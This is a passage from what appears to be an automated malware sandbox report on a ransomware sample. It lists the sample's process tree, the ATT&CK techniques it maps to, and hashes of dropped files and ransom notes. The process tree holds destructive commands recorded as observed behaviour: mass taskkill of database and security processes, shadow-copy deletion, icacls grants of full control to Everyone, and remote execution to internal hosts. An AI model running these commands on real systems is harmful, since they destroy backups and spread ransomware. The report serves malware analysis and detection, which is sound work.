    - Suspicious use of AdjustPrivilegeToken
    PID:4552
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4684
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:5960
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:4572
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:1092
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:2456
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:2636
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:5148
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:5004
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:5896
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4392
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4936
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:4416
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:4444
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:5584
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:4492
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:5104
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:4992
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:1572
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    PID:5720
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6072
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    PID:420
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:2568
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4752
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:756
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1472
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4428
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5832
- - C:\Windows\SysWOW64\arp.exe
    "arp" -a
    3⤵
    PID:4456
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4660
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.33 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:3580
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:5364
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:6120
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4164
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4900
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4988
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.15 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:5280
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.16 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:5136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4004

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of WriteProcessMemory
PID:4804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\HOW_TO_DECYPHER_FILES.txt

MD5
c74ba22cc97598c5c9f0be32d104de40

SHA1
3290677e5c078e3bfbd070b10c65d99aa4ea4c1d

SHA256
83c93f0bb4e7c7987d03812517e71615a39fdd266b31a609d30383d05d34f435

SHA512
cbc6e22563f16d9cd3d6938dd4d19a3086c75ae373a2e6117ff125be4c7f0f81162c83cc510e4c145cfd3373f19da9b5002f3142895bedc174e74604d354cef7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
360d22dca66a40b1714ccbc4d726c24d

SHA1
274379044aec51215a50094f2dd3688bfb4a501d

SHA256
62eb6183fec4d4e7c0f14ce1b9dd64e09c4d33e57db13b988d725d4b7c1d74ba

SHA512
88d4659e5b78f08e32e9a523552e26626c2146b4c0f825091e2700caf53e3d6dd5c72a59c506c3fe5866a776896c989d4fb2106fcbe5ade32a50fa7d91042928

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
2d723a1f02ced43cf0f17eb43cb8a91a

SHA1
1f0a40a30b26a9ca950777e25a9ecbf779b1243b

SHA256
ed6de331dc6c34d207b2c0d4e569ff0be494699030a31205abb35fc4fb8089f0

SHA512
cd0031ad3eb34376f32c415e09a83496523fb9fe8b6167aa29e33d8d61acf8be988b7f4e3b1bd06ddcf63ff4fa65134dbb1e911f7f593124b8484e499a1f5195

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
7903dc5f981258ee76b180d2d845240d

SHA1
59a624044c8a93f38dd5b1f6f1f2d7a0e9ec11f0

SHA256
e3b39e77800eba057c2c7917875afedf19747436c5e64afc727980e9efb72b5a

SHA512
d3518b629da24837f0f62497d603ff5700a8e0b679b9aac2c93e7aa1bf8fafe414902c7e78137f0388d2873741c5337bf1e1f064185baa0d4b7e0d4d77628880

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
005e0b1f184ad8e5342ec3661e447d0c

SHA1
dc6affd97373746e15b5b5e92a377e2ed42c904e

SHA256
19287e2a0f01b1a06c988c74edcb9a1bfde4a2443d0b9061cdeec2b1bb08e411

SHA512
7aa195cbdce9ce56dd70fdf2c27f85f8c4cbee76dcc2f81162ac6fdfeee265b50c2b1576f931a9ed88f33806381a473dec72ce824ff13ad239a7f6c4ddf7f4ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
6b46110d5039ff269b6c1fcf7a4e425d

SHA1
38fff0623c75f8c86227e2ab322825f3363d7e6b

SHA256
5e0f213d01042425dede81fce3d51cb5097064622bade7e73dd6a37f5f14503c

SHA512
9cd27fda44ab64a7f3695736e09f7ed2df88a50262bb598e48891acfe37b20b7e56df10af231e8ebd2f706ce7027b1839e201236f17ce4bf7275f08ceae653b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ab1e9ff6feca3d46686c4f7ab678aefd

SHA1
038d956e4a7b77407459de0734945875bfb2930d

SHA256
ddcb93e4282800c713cf8f655fe2ff06c77c084092e4feb9f3fefaac37c9eba0

SHA512
89451d8d9869c4a83bc01169cf13b065c229998c6b4c9193c57131b01834f929ca98eba712420db5258666f3d9e06ae52debd8310419e7a989dc0190b20d67e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f2e3fbeb4069f31a2a2344b81cfcd49f

SHA1
3f055f2d69749e948e4835289c76422c548498f4

SHA256
e593e3bdc94ad1988ff8f9278b2591fd0cc13fb7bfd6df9b02fbcb29867f40d4

SHA512
30908b4438593f15cf9a95e2090e65387763d6ab59a8ddfb9066c53c4345ca69c86f774be8f49f8ec6a2964b3fd05eaedc700dc0e8ceaab8626585113be0f4d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
816907b25cfdca50a97648f77c6e1447

SHA1
5b13723e4838022bf63c6622cae2cd286ff35c34

SHA256
ce81196926900388f41588448357d2b1682862894dff59d6fdf69ac0c323e931

SHA512
553b1fbeafda2d005b2f0558be9b1351d62289f42dff3c5129d9548cb2493c18f18c8773879da4c08cb5946b028713c525144e40aa843ee4d7d5e9cf196a36fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
816907b25cfdca50a97648f77c6e1447

SHA1
5b13723e4838022bf63c6622cae2cd286ff35c34

SHA256
ce81196926900388f41588448357d2b1682862894dff59d6fdf69ac0c323e931

SHA512
553b1fbeafda2d005b2f0558be9b1351d62289f42dff3c5129d9548cb2493c18f18c8773879da4c08cb5946b028713c525144e40aa843ee4d7d5e9cf196a36fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
816907b25cfdca50a97648f77c6e1447

SHA1
5b13723e4838022bf63c6622cae2cd286ff35c34

SHA256
ce81196926900388f41588448357d2b1682862894dff59d6fdf69ac0c323e931

SHA512
553b1fbeafda2d005b2f0558be9b1351d62289f42dff3c5129d9548cb2493c18f18c8773879da4c08cb5946b028713c525144e40aa843ee4d7d5e9cf196a36fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
e3b94a4bf3dda1a908bfadcd36d4f2ba

SHA1
b112b0bc81cb893e513744af9b161b6ff7e88f75

SHA256
41c9cec8833cf14f3d37b69fdba0dff65ddf126b6f001a6c732ae0bdaab91e3b

SHA512
ad6281207009d2d1ed54908c3393a2d822f389cf947c4f4105d1c1aa85c2d39ea1510fee517e4c75a0e4d56255c38ad4f2da278e7be178a60040fc14697c9b84

Download Submit
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

MD5
3de060c1a25fb75735767e9450ed797d

SHA1
8c0e899fc89aa8e0201aa8ee4ba41cd05702116e

SHA256
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698

SHA512
4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

MD5
3de060c1a25fb75735767e9450ed797d

SHA1
8c0e899fc89aa8e0201aa8ee4ba41cd05702116e

SHA256
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698

SHA512
4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\lkvf3rwq.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\lkvf3rwq.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5
5eacb6f69e321f41fe94b343a3c63200

SHA1
f05568cb8f59feacf1f491e044d59918449b6ae3

SHA256
41ab5ef6b072fc6ae6572bcf54dbf515b612e150112ddeaf252989289832acb4

SHA512
f5fa16d5edd6295a2df139e7ccb4a3689ef650fbe434b33df2787bc670809face1dfbd796b36f92801b351eaafe6cea1a8b86da80675e5f855368e093aa14f33

Download Submit
C:\Users\All Users\Microsoft\User Account Pictures\HOW_TO_DECYPHER_FILES.txt

MD5
c74ba22cc97598c5c9f0be32d104de40

SHA1
3290677e5c078e3bfbd070b10c65d99aa4ea4c1d

SHA256
83c93f0bb4e7c7987d03812517e71615a39fdd266b31a609d30383d05d34f435

SHA512
cbc6e22563f16d9cd3d6938dd4d19a3086c75ae373a2e6117ff125be4c7f0f81162c83cc510e4c145cfd3373f19da9b5002f3142895bedc174e74604d354cef7

Download Submit
C:\Users\All Users\Microsoft\User Account Pictures\guest.png.crypted

MD5
8ca6f71263015b104e9b99a8298beb01

SHA1
c0baf01c9934b6037d85160ea80331ebb45c8ecf

SHA256
d0fd5a45025eb37927d83627d004062c5a9799c13569bf7e885cdbf966a2908c

SHA512
2f4ca0dd827c2d10bc34af39f10512675efc58475bff9e964e2ee9ed89d03f00c4e2e4a07dbef5db1a791ed5cd986c30f2325b2392884ce1ce5329acce16b47d

Download Submit
C:\Users\All Users\Microsoft\User Account Pictures\user-192.png.crypted

MD5
6b01ca4f2c226eaab39353704d20afd6

SHA1
dac7f4435e1545aab76fd111ef267a3e147fc146

SHA256
bf0821e6fba8552de7bd3f8dd9299fcd155fe32f0ec7165783a1289c43d4cba1

SHA512
2852255dd2fdc863cc00182699c7ca2c0f22015428417f57e7efe489b37fc6e162d89753134356c90e4b1d04142dc57e6698b903237113d68c52f6f6c421c886

Download Submit
C:\Users\All Users\Microsoft\User Account Pictures\user-32.png.crypted

MD5
9b7054f900b1067e69c9726fbf22a302

SHA1
92e69e6261981a96844411c3c602f10584850995

SHA256
1452ade63613c6dd42d1fa0a01039b64741d1dfa9f63f05d02bf9544518cc6a4

SHA512
ece12d225deb07e20922462c02609343dd0cb2469c193b204feacda4f7872cc90bffcd6171eb6e3ba58150ad632f955f0a57625391692357f99321bdb40caf3a

Download Submit
C:\Users\All Users\Microsoft\User Account Pictures\user-40.png.crypted

MD5
8217b7313da1894b2066b3db20db96cf

SHA1
a54854455a48fd8e7c660b2e9d30afbcf0bf3cd6

SHA256
d6e4f84a6b4aa7a5f091ea5bdbc4a95d09a54c8689f725f523b9f2157aff5729

SHA512
748f13c7a690244a0d64e2a88b650de34549fe206b938ddf920117fabe27255a2d6aa15f8fd9babfe9b0f6cde2eae9f832ae61b642141f7cff3a71f8f95a634d

Download Submit
C:\Users\All Users\Microsoft\User Account Pictures\user-48.png.crypted

MD5
58ddf976752e5d61a3a5ce5c908ff393

SHA1
d61cde86bc90ea643e4da0b01e9c2aec5bec1315

SHA256
319e98c6031a8d90a725958ca3ebfed538061a8826203882bcc276cbd484f84b

SHA512
1d00e9a4ab6c46f36ff4976ba04393820e424491543116ac60c51902ab4b90a221200c692715e8b08ad3cfe137724c30bcb5312f4268e61701a04abd9716fe3c

Download Submit
C:\Users\All Users\Microsoft\User Account Pictures\user.png.crypted

MD5
8ca6f71263015b104e9b99a8298beb01

SHA1
c0baf01c9934b6037d85160ea80331ebb45c8ecf

SHA256
d0fd5a45025eb37927d83627d004062c5a9799c13569bf7e885cdbf966a2908c

SHA512
2f4ca0dd827c2d10bc34af39f10512675efc58475bff9e964e2ee9ed89d03f00c4e2e4a07dbef5db1a791ed5cd986c30f2325b2392884ce1ce5329acce16b47d

Download Submit
C:\Windows\TEMP\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\TEMP\tmpD802.bat

MD5
1af2c796c268a8160d0d93e8866dc7b0

SHA1
6d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f

SHA256
94e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8

SHA512
af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\Temp\awtiy2j3.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
70b3ee3839890cd6e33de100160aa0f3

SHA1
ea985ff7cc4164f5f436cb0ab193bd598fd51a49

SHA256
fe9953998fabade77ae9294bb7fedfe83a59e7289a7dece404a8c82f15f7e46e

SHA512
5f12857006e4f6fe1130f2135a13575f606d3d7863cdcfdd207443bbfb9039b3b041cfb48ea5dd8daec318a7287891d3bfb2086c23bf6b0aa09bc254330274da

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
